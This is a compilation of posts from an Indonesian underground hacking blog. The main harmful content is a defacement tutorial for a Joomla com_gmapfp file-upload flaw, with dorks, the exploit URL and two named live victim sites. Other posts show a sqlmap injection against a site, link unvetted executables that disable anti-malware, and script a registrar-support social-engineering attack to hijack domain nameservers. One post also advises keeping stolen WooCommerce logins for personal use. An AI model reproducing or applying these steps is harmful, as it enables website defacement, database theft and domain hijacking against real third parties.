Yow Halo semuanya, udh lama banget ya gw gak ngeblog di situs ini lagi, terakhir kali gw post itu bulan januari tanggal 1, dan sesuai janji gw... gw gk akan selamanya ninggalin blog ini, gw bakal ttp nulis walaupun itu bakalan jarang banget, ok langsung aja ke topik pembahasan.


Topik pembahasan kali ini, seputar web hacking ya, skrg banyak bgt orang" yang pada berburu/mainan WooCommerce dan banyak juga yang beli" loginan Wp WooCommerce ini dengan harga tinggi malahan dan kalian menjualnya tanpa ada perhitungan, gw tau karena gw sendiri masih suka nyimak Grup" Heker Zaman Skrg, nah ada beberapa pertanyaan dari kalian yang akan gw jawab di blog ini,


1. Bang Aman Gak Sih Main WooCommerce ? 

    

    gw rasa kalian pasti sudah tau jawabannya, ya jelas tidak lah, dalam menjalani aktivitas ilegal gk ada yang namanya aman, apalagi jika sistem payment menggunakan paypal, persentase keciduknya itu 75% karena sistem paypal itu gk pseudoanonymous , beda halnya dengan menggunakan payment Crypto, karena kita tau sendiri jika kalian membuat wallet crypto kita tidak perlu memverifikasi alamat,ktp,dan data" pribadi kita sndiri, kita ambil contoh saja di kasus FaucetPay kena hack.

nah si hacker menggunakan wallet crypto, sehingga pihak FaucetPay Sendiri sulit untuk melacaknya, atau mungkin lebih buruknya gk bisa di lacak, jadinya harus menelan kerugian 8.8 Miliar, "ah bang tp gw aja gk pernah keciduk" ya gw saranin taubat aja sih, tuhan masih sayang lu, masih di kasih kesempatan untuk taubat tp malah dimanfaatkan untuk berbuat maksiat hadehh.


2. Kalo Gw Jual Loginan WP yg ada WC ( WooCommerce ) rugi gak sih ?

    Kalo ini sih tergantung diri kalian sndiri, tp klo opini gw sih lu rugi, ya pikir aja, contohnya lu jual ke buyer dengan harga 2 juta, tp pas si buyernya ngelog Web nya, bisa jadi dia bakalan dapet uang lebih dari 2 juta, ya intinya kalo nemu loginan yang ada WC nya lu pakai sendiri aja, TAPI INGAT berani berbuat, berani bertanggung jawab

Ya intinya gini, sebisa mungkin carilah uang dengan pekerjaan yang halal, walaupun sedikit tapi itu berkah, dan segeralah bertaubat, tuhan masih sayang dengan dirimu, gw juga pernah bandel, tp dulu, skrg mah udah tua, mikirin tugas2 kuliahan pusing bet ( yaah jadi curhat~~ )


itu aja sih pesan dari gw, ya gw sadar sih pesan gw gk bakalan berguna buat diri lu yang otaknya batu, chuaakkzzz, canda


Keep Calm And Stay Halal

 huufftt, gk sadar udh tahun baru lagi, dan ini mungkin tahun terakhir saya di dunia underground :D
banyak kenangan di 2020 dan kita akan mengukir kisah baru lagi di 2021.
blog2 dan domain ini akan saya sumbangkan ke Writer lain.

ya seperti yang kalian lihat, saya sudah jarang update blog, dulu biasanya 1 kali seminggu atau bahkan setiap hari, ngeblog dari 2007 dan skrg udah 2021 ya wajar ada rasa bosan, harus fokus ke pekerjaan lain, dan teman2 blogger yang lain pun banyak yang udah pensiun. walaupun mungkin saya akan berhenti ngeblog dan memberikan blog, domain serta subdo, ini ke writer lain, namun saya akan menyempatkan waktu utk ngeblog lagi ( 1 atau 3 bulan sekali buat update konten )

dan terimakasih juga buat teman2 blogger, underground, dan visitor ku yang udah bantu support dari 0 sampai sekarang, gak kebayang tanpa kalian blog ini gk akan sebesar ini, sampai bisa beli domain, dulu mah pake domain gratisan :b

jadi ini aja yang ingin gw sampaikan, big thanks for you all :D
2007 - 2021 Xyz

yow halo exploiter, udah lama gk ngeposting lagi hampir sebulan :D, sibuk belajar wkwk.. ok sesuai judul, kali ini saya akan membagikan tutorial "Cara Menggunakan API Hackertarget Dan Mengimplementasikan Kedalam Bash" sangat mudah.

contoh disini saya akan menggunakan api reverse ip dari hackertarget dokumentasi bisa baca disini : https://hackertarget.com/reverse-ip-lookup/ 
pada dokumentasi tersebut terdapat bagian "Reverse Ip Lookup API" api tersebut bisa kita gunakan tp kena limit perhari :b. klo gk mau kena limit beli gan :b.

kalian bisa melakukan request menggunakan CURL
contoh sederhana :

curl -s "https://api.hackertarget.com/reverseiplookup/?q=linuxploit.com"
Bagaimana cara mengimplementasikan kedalam BASH ?

Flow simplenya :
1. Input Domain
2. Melakukan request ke API Hackertarget
3. Tampilkan Output berupa respone

contoh script :
#!/bin/bash
read -p " Masukan nama domain : " domain # Variable domain
curl -s "https://api.hackertarget.com/reverseiplookup/?q=$domain" # Variable domain dipanggil

Cara Menggunakan API Hackertarget Dan Mengimplementasikan Kedalam Bash


 yow halo semuanya, sudah lama ya gak update artikel krena saya sibuk nimbrung di forum2, dan kali ini saya akan membagikan cara, menurunkan penggunaan CPU.
kalian bisa liat sndiri penggunaan CPU saya bener2 rendah, padahal bnyk program yg dijalankan.

Cara Mencegah Penggunaan CPU 100% Pada PC/Laptop/RDP

bagi kalian yg sering menggunakan Pc/Laptop untuk melakukan aktivitas seperti main game, ngehek dll, klo CPUnya sampe 100% pasti ngelag kan, dan bagi kalian yg suka make RDP hal yg di takutkan itu pasti CPU 100%, klo udah 100% gak lama lagi bakalan mokad :b

ada bbrp program yg membuat pemakaian CPU menjadi tinggi, salah satunya yg memakan bnyk CPU adalah AntiMalware, coba kalian cek deh task manager di PC/RDP kalian, nah yg paling bnyk makan CPU pasti Anti Malware, ya jujur bagi saya sih juga agak terganggu, ya maklum pc kentang gan :)

oh iya, kalian juga harus tau apa efek samping yg ditimbulkan saat menonaktifkan service ini. salah satunya adalah, PC/laptop kamu gk ada anti virusnya dan Pc/Laptop kamu bakalan vulnerable, ya bagi saya sendiri sih gpp, karena saya juga masih bisa jaga laptop untuk menghindari virus2 dan tidak mengakses situs yg sembarangan. bagi kalian yg takut kena virus saya sarankan jangan mendisable anti malware

Ok download disini anti malware packnya : https://anonfiles.com/J2K4V3k7pd/AntiMalwarePack_Linuxploit_zip
dan extract kemudian baca README.txt untuk cara jalaninnya

ok sekian dari saya, and do this at u own risk :)

 Yow halo exploiter, udah lama gak update konten ya, lagi males n sibuk kerja juga :b. kali ini saya akan menshare tutorial deface exploit com_gmapfp arbitary file upload. exploit ini masih baru ya ( 2020 ) dan gk smua versi gmapfp yg bisa di exploitasi, hanya versi J3.5 saja, ok langsung aja gausah lama2 :D.

#Google Dork :
inurl:"com_gmapfp
inurl:/components/com_gmapfp/

#Exploit : index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload

#Live Target :
- https://www.aeroclub-savoie.com/
- https://www.turizam.mostar.ba

1. pertama kalian bisa dorking dlu, atau langsung saja pake live target itu untuk belajar

2. kalian masukkan exploit nya di akhir domain / path
contoh : https://www.aeroclub-savoie.com/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
atau https://www.aeroclub-savoie.com/[PATHNYA]/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload

3. jika muncul tempat upload sperti ini silahkan kalian upload file gambar/mungkin kalian juga bisa upload shell ( butuh bypass )

Deface Exploit COm_gmapfp Arbitary FIle Upload
4. kemudian kalian upload aja filenya, disini saya akan upload file pwn.gif

Deface Exploit Com_gmapfp Arbitary File Upload

5. dan jika ada alert seperti ini, itu tandanya file berhasil di upload

6. dan cara akses filenya target.com/images/gmapfp/filemu.jpg atau target.com/images/stories/gmapfp/filemu.jpg

7. and boom
- https://www.aeroclub-savoie.com/images/gmapfp/pwn.gif
- https://www.turizam.mostar.ba/images/stories/gmapfp/pwn.gif

 Ok ini saja yg bisa saya sampaikan, jika kurang paham silahkan tinggalkan pertanyaan di forum chat

Yow halo exploiter, masih seputar bug di situs mirroring, kali ini saya menemukan bug di situs yg sudah tertera di judul :b, ( alay lu bang situs ginian di buat konten ) well ini hanya sebuah arsip :b.

saya tau situs ini dari temen di chat "ada web baru nih, gaskan" yaudah langsung tak gas aja yakan. mumpung lagi gak ada kerjaan juga. dan sperti biasa sebelum mulai sy slalu scan sql injection parameter dengan nmap.

kemudian saya mendapatkan parameter yg vulnerable pada bagian mirror.php?id= dan saya sudah tau pasti web ini pakai SQLite ya tanpa basa basi saya langsung inject aja.  get db nya menggunakan --tables bukan --dbs

sqlmap.py -u http://mirror/mirror.php?id=XX --tables --random-agent -v 3

dan mendapatkan hasil seperti ini


dan saya juga bisa dump lebih dalam lagi :D, tapi tidak akan saya tunjukkan disini

saya juga menemukan bug XSS tapi tidak terlalu penting dan very useless gak guna, jadi saya hanya incar bug yg critical saja, gak kayak tim sebelah udh share bug tanpa write up lagi

LAWAK LO HEKER WHATSAPP

Greetz : C374H 404


 Yow halo exploiter, udah lama gak post lagi dan kali ini saya akan membagikan sebuah tools pack / installer yang didalamnya ada banyak tools penunjang bot :b. ya saya tau kalian tidak punya skill jadinya harus ngebot, dan gpp juga saya pun dpt untung ( viewnya banyak xD ) walaupun gk ngebot mungkin saya akan membagikan tools2 ngebot di situs ini.

Isi didalam toolsnya lupa, kurang lebih ada 13 tools, kalian cek aja sendiri. download disini : 
- Link 1 : https://mega.nz/file/NQty0TLK#Cdmb1popifjprh5t4UV8mNs5z5bjMyClxgE4PIqg4hg
- Link 2 : https://anonfiles.com/l0N5w9V9od/Ngebot_Stater_Pack_EXE

sizenya 22mb

 dan cara installnya mudah saja, cukup buka dan klik yes ( lihat gambar dibawah ).

Tools Ngebot Stater Pack.Exe

dan disini klik yes lagi

Tools Ngebot Stater Pack.Exe

dan terakhir kalian tentukan dir penginstalan nya 

Tools Ngebot Stater Pack.Exe

dan selesai.
jangan lupa share artikel ini juga :D


Updated 2021-03-03
- Fix Link Download
DNS Hijacking Through Social Engineering - ok halo semuanya, kali ini saya akan menjelaskan sedikit mengenai tehnik deface eh tp gmana ya, mau dibilang "tehnik deface" kedengarannya sangat jijikk, soceng lebih sampah dari pada fake proof ya :D. domain ini dlu juga pernah ke soceng btw, padahal kan make blogger, sempat mikir mungkin akun gmail saya ke hack, ternyata pas tak cek ns nya mengarah ke hosting murahan ealah chuaakkzz.. cuih.. kerentanan ini tidak terletak pada sistem, melainkan pada manusianya, kalo goblok ya langsung ke soceng. ya intinya sama2 goblok lah yg kesoceng sama yg nyoceng modal live chat cs sambil COLI minta ubah NS diarahin ke hosting murahan. goblok. mati aja xD. setelah kejadian itu banyak yg nanya ke gw, minta penjelasan mengenai DNS Hijacking Through Social Engineering.

DNS Hijacking Through Social Engineering

contoh - disini si attacker memulai untuk melihat email yg dipakai untuk membuat situs yg kita incar, kita contohkan saja linuxploit.com mengeceknya mudah saja, bisa via online di situs http://tools.xploitsecid.or.id/Exploit/Whois dan jika kamu Linux User, tinggal masukkan command :

whois linuxploit.com 
dan lihat di bagian Registrant email, kalian bisa lihat email yg dipakai daftar utk domain linuxploit.com

linuxploit.com di daftarkan di ni*gahoster.co.id dan disini attacker akan mengunjungi situs tempat didaftarkannya linuxploit.com, si attacker langsung melancarkan aksinya, dan langsung Live Chat dengan CS yg sedang aktif.

Contoh CS Dengan Ketololan 99%
Attacker : halo ni*gahoster saya pemilik domain linuxploit.com saya ingin mengubah ns linuxploit.com saya kesulitan mengubahnya, tolong bantu saya
CS : maaf bapak harus login ke member area terlebih dahulu
Attacker : saya kesulitan mengubahnya melalui member area, dan slalu gagal, jika niagahoster tidak percaya bahwa saya pemilik domain linuxploit.com akan saya tunjukkan email dan password member areanya, email : [email protected] dan password akuheker1337 ( password palsu )
***disini si CS hanya mencocokkan email saja dan passwordnya tidak, karena mungkin jika email cocok si CS sudah percaya bahwa si attacker adalah pemilik domain linuxploit.com***
CS : Baik Saya Bantu. NS nya akan di arahkan kemana ?
Attacker : ke ns1.blablabla & ns2.blablabla mas/mbak
CS :  baik sudah kami ubahkan. butuh waktu maksimal 1x24 jam untuk perubahan Name Server lama ke Name Server Baru
Attacker : terimakasih
CS : ada yang mau di tanyakan lagi ?
Attacker : tidak terimakasih

nah itu adalah contoh CS yg ketololannya melampaui batas, setiap IQ CS berbeda2 hal utama adalah jangan sekali2 langsung meminta mengubah NS.

Contoh CS Tolol Lvl2 (  Kronologi Linuxploit.com Tersoceng )
saya tunjukin pake foto aja, capek ngetik :b
Attacker Memulai Aksi, dan memasukkan email yg didaftarkan oleh situs linuxploit.com

Attacker Mengirim Email Palsu Dengan Fake Email Sender dan mengatasnamakan email [email protected]

itu asli History percakapan Attacker dengan CS [ asli ], saya sendiri sih salut sama caranya si attacker menyoceng CS nya tapi ya tetep aja goblok, udah nyoceng mana ft lagi :b.
dan saat itu jga saya konfirmasi ke pihak ni*gahoster untuk tidak menerima perubahan NS sebelum masuk ke member area, dan saya juga menitip pesan jika ada yg ingin melakukan perubahan terhadap situs linuxploit.com jangan di tanggapi, karena saya tidak akan merubah ns dengan Cara MENGEMIS/MEMINTA TOLONG. jika masih terjadi, akan saya tegaskan ke pihak ni*gahoster.

oke itu saja yg bisa saya sampaikan, kurang lebihnya mohon maaf. kalo gk mau di maafin y bodo amat lo siapa xD.